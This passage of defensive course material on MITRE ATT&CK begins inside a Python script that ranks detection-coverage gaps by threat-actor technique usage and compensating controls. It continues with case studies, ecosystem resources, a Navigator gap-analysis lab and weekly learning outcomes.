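}

# Constructed detection coverage scores on the 0-100 scale; an unlisted
# technique scores 0 (no detection).
COVERAGE = {"T1059.001": 50, "T1003.001": 50, "T1021.001": 25, "T1078": 25}

# Control-to-technique mapping from the section above, at parent-technique
# level; T1055 is added to allowlisting per the Process Hollowing example.
CONTROLS = {
    "Multi-Factor Authentication": {"T1078", "T1110", "T1558", "T1539"},
    "Application Allowlisting": {"T1059", "T1204", "T1218", "T1053", "T1055"},
    "Network Segmentation": {"T1021", "T1570", "T1072"},
}

PRIORITY_ORDER = {"HIGH": 0, "MEDIUM": 1, "LOW": 2, "COVERED": 3}


def parent_technique(tid):
    """T1055.012 -> T1055; a parent ID is returned unchanged."""
    return tid.split(".")[0]


def controls_for(tid, controls=CONTROLS):
    """Controls mapped to the technique itself or to its parent technique."""
    return sorted(name for name, techs in controls.items()
                  if tid in techs or parent_technique(tid) in techs)


def classify_gap(actor_count, score):
    """Priority bands as defined in the scenario: HIGH = 2+ actors and no
    detection, MEDIUM = partial detection; the rest is LOW or fully COVERED."""
    if score >= 100:
        return "COVERED"
    if score == 0:
        return "HIGH" if actor_count >= 2 else "LOW"
    return "MEDIUM"


def gap_report(actors=ACTOR_TECHNIQUES, coverage=COVERAGE, controls=CONTROLS):
    """One row per technique any actor uses, ranked into an improvement backlog:
    priority band, then number of actors, then lowest coverage score first."""
    usage = {}
    for actor, techniques in actors.items():
        for tid in techniques:
            usage.setdefault(tid, []).append(actor)
    rows = []
    for tid, who in usage.items():
        score = coverage.get(tid, 0)
        rows.append({"technique": tid, "actors": sorted(who), "score": score,
                     "priority": classify_gap(len(who), score),
                     "compensating_controls": controls_for(tid, controls)})
    rows.sort(key=lambda r: (PRIORITY_ORDER[r["priority"]], -len(r["actors"]),
                             r["score"], r["technique"]))
    return rows


if __name__ == "__main__":
    for r in gap_report():
        ctl = ", ".join(r["compensating_controls"]) or "none mapped"
        print(f"{r['priority']:7} {r['technique']:10} actors={len(r['actors'])} "
              f"score={r['score']:3} controls: {ctl}")
```

The `compensating_controls` column answers the gap analysis question directly: T1055.012 and T1218.011 resolve to Application Allowlisting, T1021.001 to Network Segmentation, while T1566.002 resolves to nothing in this mapping, which flags it as a gap that needs a detection rather than a control.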
Key insight: Gap analysis combines threat intelligence with defensive assessment. The result is a prioritized, threat-informed improvement roadmap.
Real-World Context
Case Study: Healthcare Ransomware Defense
A healthcare organization used ATT&CK to improve defenses against ransomware. They identified three ransomware groups targeting healthcare: Ryuk, Conti, and BlackCat. Mapping each group's TTPs to ATT&CK revealed 35 common techniques. They assessed current detection coverage: 40% of techniques had solid detection, 30% had partial coverage, 30% had no coverage. The gap analysis identified critical blind spots: T1566.001 (phishing), T1486 (data encrypted), and T1490 (inhibit system recovery). They prioritized improvements: Phase 1 addressed phishing with enhanced email security. Phase 2 added volume shadow copy monitoring. Phase 3 improved credential access detection. Six months later, coverage improved to 75%, and a Ryuk attempt was detected during initial access.
Case Study: Red Team Reporting
A penetration testing firm adopted ATT&CK for reporting. Each finding was mapped to techniques, enabling clients to understand exactly what adversary behaviors succeeded. A Navigator layer accompanied each report showing techniques used, techniques detected, and techniques that succeeded undetected. This transformed reports from "we got domain admin" to "T1078 (valid accounts) via T1110.003 (password spraying) enabled T1003.001 (LSASS) leading to T1021.002 (SMB) lateral movement." Clients could immediately map findings to their detection coverage and prioritize improvements.
ATT&CK Ecosystem:
ATT&CK-Related Resources:
MITRE Projects:
- ATT&CK Navigator: Visualization tool
- ATT&CK Workbench: Customize ATT&CK
- CALDERA: Adversary emulation platform
- CAR: Cyber Analytics Repository (detections)
Community Projects:
- Sigma: Generic detection rules with ATT&CK tags
- Atomic Red Team: Technique testing
- MITRE Engenuity: ATT&CK evaluations
- DeTT&CT: Detection coverage mapping
Vendor Integration:
- Most SIEMs map rules to ATT&CK
- EDR vendors report ATT&CK techniques
- Threat intel platforms use ATT&CK
Research Resources:
- ATT&CK Blog (medium.com/mitre-attack)
- ATT&CKcon presentations
- Academic research citing ATT&CK
ATT&CK has become the universal language for discussing adversary behavior. Mastering it connects you to a global community of defenders.
Guided Lab: ATT&CK Navigator Layers
In this lab, you'll create multiple ATT&CK Navigator layers and perform gap analysis.
Lab Environment:
- Web browser with ATT&CK Navigator (attack.mitre.org/navigator)
- Threat actor reports (provided)
- Detection inventory (provided scenario)
Exercise Steps:
- Access ATT&CK Navigator and create new Enterprise layer
- Build threat actor layer from provided reports
- Build detection coverage layer from scenario inventory
- Use layer operations to identify gaps
- Prioritize gaps using threat relevance
- Create detection engineering recommendations
- Export and document layers
Reflection Questions:
- What techniques appeared across multiple threat actors?
- Where were the most significant detection gaps?
- How would you prioritize improvement efforts?
Week Outcome Check
By the end of this week, you should be able to:
- Explain ATT&CK structure (matrices, tactics, techniques, sub-techniques)
- Map threat reports and intelligence to ATT&CK techniques
- Create and use ATT&CK Navigator layers
- Perform layer operations for gap analysis
- Develop ATT&CK-based detection engineering priorities
- Assess detection and control coverage using ATT&CK
- Compare threat actors using ATT&CK technique mapping
- Communicate defensive gaps using ATT&CK framework
📚 Building on Prior Knowledge
ATT&CK mapping connects to earlier frameworks and operations:
- CSY101 Week 13 (Threat Modeling): Convert STRIDE threats into ATT&CK techniques.
- CSY104 Week 11 (CVSS): Translate technique impact into risk prioritization.
- CSY204 (SOC/IR): Use ATT&CK to drive detection coverage and triage playbooks.
🎯 Hands-On Labs (Free & Essential)
Practice ATT&CK mapping before moving to reading resources.
🧭 ATT&CK Navigator: Detection Gap Layer
What you'll do: Create a layer highlighting techniques with weak coverage.
Why it matters: Gap analysis drives detection priorities.
Time estimate: 60-90 minutes
🧪 MITRE CAR: Technique-to-Detection Mapping
What you'll do: Map 3 ATT&CK techniques to CAR analytics.
Why it matters: Shows how to translate intel into detections.
Time estimate: 45-60 minutes
📝 Lab Exercise: Advisory-to-ATT&CK Mapping
Task: Map one CISA advisory to ATT&CK techniques and write 3 detection ideas.
Deliverable: Technique list with notes and detection gaps.
Why it matters: Teaches practical translation from reports to action.
Time estimate: 60-90 minutes
🧩 Lab: Supply Chain Technique Mapping
What you'll do: Map supply chain techniques (e.g., T1195) to ATT&CK and detections.
Deliverable: Technique list with telemetry sources and gaps.
Why it matters: Supply chain defenses require explicit coverage mapping.
Time estimate: 60-90 minutes
💡 Lab Tip: Map techniques to telemetry sources so gaps are measurable.
🧩 Supply Chain Techniques in ATT&CK
ATT&CK includes supply chain techniques and related behaviors. Map them explicitly to avoid blind spots in detections.
Supply chain focus areas:
- T1195 (Supply Chain Compromise)
- Credential access via third-party tools
- Abuse of signed updates or installers
- Trusted relationship misuse
📚 Building on CSY101 Week-13: Threat model upstream and downstream trust relationships.
Resources
Lab
Complete the following lab exercises to practice ATT&CK framework application.